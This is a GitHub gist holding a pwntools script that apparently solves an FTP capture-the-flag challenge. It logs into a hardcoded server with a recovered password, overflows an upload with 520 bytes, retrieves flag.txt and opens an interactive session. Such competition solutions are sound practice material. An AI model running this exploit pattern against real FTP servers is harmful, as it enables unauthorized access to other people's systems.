Skip to content

Instantly share code, notes, and snippets.

@lassimus lassimus/sol_ftp2.py
Last active Sep 24, 2015

Embed
What would you like to do?
#!/usr/bin/python
from pwn import *
from Crypto import Random
import time
# dst = "localhost"
dst = "54.175.183.202"
s = remote(dst, "12012")
pw = "0e42011f121d05".decode('hex') #valid pw from solving ftp1
time.sleep(1)
s.send("USER blankwall\n")
time.sleep(1)
s.send('PASS ' + pw)
log.info(s.recvuntil("logged in\n"))
s.send("PASV\n")
s.recvuntil("on port: ")
port = s.recv(5)
s.send('STOR {}\n'.format("tacos"))
sender = remote(dst, port)
log.info("Storing on port: {}".format(port))
sender.send('A'*520)
sender.close()
s.send("PASV\n")
s.recvuntil("on port: ")
port = s.recv(5)
log.info(port)
sender = remote(dst, port)
s.send("RETR flag.txt\n")
log.info(sender.recv(37))
sender.close()
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.